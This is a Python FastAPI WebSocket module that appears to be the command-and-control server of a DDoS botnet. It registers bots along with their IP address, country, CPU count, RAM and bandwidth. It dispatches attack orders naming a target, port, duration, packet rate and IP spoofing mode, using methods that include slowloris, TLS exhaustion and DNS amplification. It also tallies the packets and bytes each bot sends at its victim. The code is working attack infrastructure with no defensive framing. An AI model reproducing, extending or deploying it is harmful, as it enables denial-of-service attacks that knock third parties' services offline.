import json
from datetime import datetime, timezone
from typing import Dict, Optional
from uuid import UUID
from fastapi import WebSocket, WebSocketDisconnect
from app.services.bot_service import BotService
from app.database import async_session
from app.models.all_models import Bot, AttackTask, AttackLog
from sqlalchemy import select

def _try_uuid(val: str) -> Optional[UUID]:
    try:
        return UUID(str(val))
    except (ValueError, AttributeError, TypeError):
        return None

class BotConnectionManager:
    def __init__(self):
        self.active: Dict[str, WebSocket] = {}
        # bot_id -> last cumulative packets/bytes (for delta stats)
        self._last_stats: Dict[str, tuple] = {}

    async def connect(self, ws: WebSocket, bot_id: str):
        await ws.accept()
        # Replace previous connection for same id
        old = self.active.get(bot_id)
        if old and old is not ws:
            try: await old.close()
            except: pass
        self.active[bot_id] = ws
        uid = _try_uuid(bot_id)
        if uid:
            try: await BotService.set_status(uid, "online")
            except: pass

    async def disconnect(self, bot_id: str):
        self.active.pop(bot_id, None)
        self._last_stats.pop(bot_id, None)
        uid = _try_uuid(bot_id)
        if uid:
            try: await BotService.set_status(uid, "offline")
            except: pass

    def rebind(self, old_key: str, new_key: str, ws: WebSocket):
        """Rebind connection key after handshake (URL uuid -> DB bot.id)."""
        if old_key != new_key:
            self.active.pop(old_key, None)
            if old_key in self._last_stats:
                self._last_stats[new_key] = self._last_stats.pop(old_key)
        self.active[new_key] = ws

    async def send_json(self, bot_id: str, data: dict):
        key = str(bot_id)
        ws = self.active.get(key)
        if not ws:
            return
        try:
            await ws.send_json(data)
        except Exception:
            await self.disconnect(key)

    async def send_attack_command(self, bot_id: str, task: dict):
        method = (task.get("method") or "UDP").upper()
        # Derive method flags so bot always receives correct mode bits
        flags = {
            "slowloris": 1 if method == "SLOWLORIS" or task.get("slowloris") else 0,
            "tls_exhaust": 1 if method == "TLS_EXHAUST" or task.get("tls_exhaust") else 0,
            "dns_amp": 1 if method == "DNS_AMP" or task.get("dns_amp") else 0,
            "game_mimic": 1 if method == "GAME_MIMIC" or task.get("game_mimic") else 0,
            "mega_mode": 1 if method == "MEGA" or task.get("mega_mode") else 0,
        }
        await self.send_json(bot_id, {
            "type": "attack",
            "task_id": task["id"],
            "target": task["target"],
            "port": task["port"],
            "method": method,
            "duration": task["duration"],
            "max_pps": task.get("pps", 100000),
            "max_threads": task.get("threads", 100),
            "spoof_mode": task.get("spoof_mode", 0),
            "fragmentation": task.get("fragmentation", 0),
            **flags,
        })

    async def send_stop_command(self, bot_id: str, task_id: str):
        await self.send_json(bot_id, {"type": "stop", "task_id": task_id})

    def stats_delta(self, bot_id: str, packets: int, bytes_: int) -> tuple:
        """Convert cumulative counters from bot into deltas."""
        last_p, last_b = self._last_stats.get(bot_id, (0, 0))
        # Reset if bot counters restarted (new attack)
        if packets < last_p:
            last_p, last_b = 0, 0
        dp = max(0, packets - last_p)
        db = max(0, bytes_ - last_b)
        self._last_stats[bot_id] = (packets, bytes_)
        return dp, db

manager = BotConnectionManager()

async def handle_bot_websocket(ws: WebSocket, bot_id: str):
    """bot_id from URL path — UUID v4 generated by bot.
    Online testers: connect wss://host/ws/bot/<uuid> then optionally send handshake JSON.
    """
    await manager.connect(ws, bot_id)
    session_key = bot_id  # may be rebinding to DB id after handshake
    # Ack immediately so WS testers see a successful open + first frame
    try:
        await ws.send_json({
            "type": "connected",
            "bot_id": bot_id,
            "message": "WebSocket open. Send handshake JSON or wait for bot protocol.",
            "expect": {
                "type": "handshake",
                "bot_id": bot_id,
                "bot_identifier": "optional-hwid",
            },
        })
    except Exception:
        pass
    try:
        while True:
            raw = await ws.receive_text()
            try:
                data = json.loads(raw)
            except json.JSONDecodeError:
                try:
                    await ws.send_json({"type": "error", "message": "Invalid JSON"})
                except Exception:
                    pass
                continue
            msg_type = data.get("type", "")

            if msg_type == "ping" or msg_type == "echo":
                await ws.send_json({"type": "pong", "echo": data})
                continue

            if msg_type == "handshake":
                identifier = data.get("bot_identifier") or data.get("bot_id") or bot_id
                handshake_bot_id = data.get("bot_id", bot_id)
                uid = _try_uuid(handshake_bot_id) or _try_uuid(bot_id)
                if not uid:
                    await ws.send_json({"type": "error", "message": "Invalid bot_id (must be UUID)"})
                    continue

                async with async_session() as s:
                    bot = (await s.execute(
                        select(Bot).where(Bot.bot_identifier == identifier)
                    )).scalar_one_or_none()

                    if not bot:
                        # Also try by primary key in case of reconnect with same UUID
                        bot = (await s.execute(select(Bot).where(Bot.id == uid))).scalar_one_or_none()

                    if not bot:
                        nb = Bot(
                            id=uid,
                            bot_identifier=identifier,
                            ip_address=data.get("ip_address") or None,
                            country=data.get("country"),
                            os_name=data.get("os_name") or data.get("os_version") or "Linux",
                            cpu_cores=data.get("cpu_cores"),
                            ram_total_mb=data.get("ram_total_mb"),
                            net_speed_mbps=data.get("net_speed_mbps"),
                            status="online",
                            first_seen_at=datetime.now(timezone.utc),
                            last_heartbeat_at=datetime.now(timezone.utc),
                            bot_version=data.get("version"),
                        )
                        s.add(nb)
                        await s.commit()
                        db_id = str(uid)
                    else:
                        # Keep DB id as canonical; rebind WS key to it
                        db_id = str(bot.id)
                        if data.get("ip_address"):
                            bot.ip_address = data.get("ip_address")
                        bot.status = "online"
                        bot.last_heartbeat_at = datetime.now(timezone.utc)
                        if data.get("cpu_cores"):
                            bot.cpu_cores = data.get("cpu_cores")
                        if data.get("ram_total_mb"):
                            bot.ram_total_mb = data.get("ram_total_mb")
                        if data.get("os_name"):
                            bot.os_name = data.get("os_name")
                        elif data.get("os_version"):
                            bot.os_name = data.get("os_version")
                        if data.get("version"):
                            bot.bot_version = data.get("version")
                        await s.commit()

                manager.rebind(session_key, db_id, ws)
                session_key = db_id
                await ws.send_json({
                    "type": "handshake_ack",
                    "bot_id": db_id,
                    "config": {
                        "max_pps": 100000,
                        "max_threads": 100,
                    },
                })

            elif msg_type == "heartbeat":
                uid = _try_uuid(session_key)
                if uid:
                    await BotService.update_heartbeat(uid, data)
                # Reply so bot knows connection is alive (prevents stale disconnect)
                try:
                    await ws.send_json({"type": "heartbeat_ack", "timestamp": data.get("timestamp")})
                except Exception:
                    pass

            elif msg_type == "attack_stats":
                task_id = data.get("task_id")
                uid = _try_uuid(session_key)
                if task_id and uid:
                    tid = _try_uuid(task_id)
                    if tid:
                        raw_pkts = int(data.get("packets_sent", 0) or 0)
                        raw_bytes = int(data.get("bytes_sent", 0) or 0)
                        dp, db = manager.stats_delta(session_key, raw_pkts, raw_bytes)
                        if dp or db:
                            async with async_session() as s:
                                s.add(AttackLog(
                                    task_id=tid, bot_id=uid,
                                    packets_sent=dp, bytes_sent=db,
                                ))
                                task = (await s.execute(
                                    select(AttackTask).where(AttackTask.id == tid)
                                )).scalar_one_or_none()
                                if task:
                                    task.total_packets = (task.total_packets or 0) + dp
                                    task.total_bytes = (task.total_bytes or 0) + db
                                await s.commit()

            elif msg_type == "attack_done":
                # Optional: mark task complete when bot finishes
                task_id = data.get("task_id")
                tid = _try_uuid(task_id) if task_id else None
                if tid:
                    async with async_session() as s:
                        task = (await s.execute(
                            select(AttackTask).where(AttackTask.id == tid, AttackTask.status == "running")
                        )).scalar_one_or_none()
                        if task:
                            # Only complete if no other bots still active — simple: leave for stop/timeout
                            pass

    except WebSocketDisconnect:
        await manager.disconnect(session_key)
    except Exception:
        await manager.disconnect(session_key)
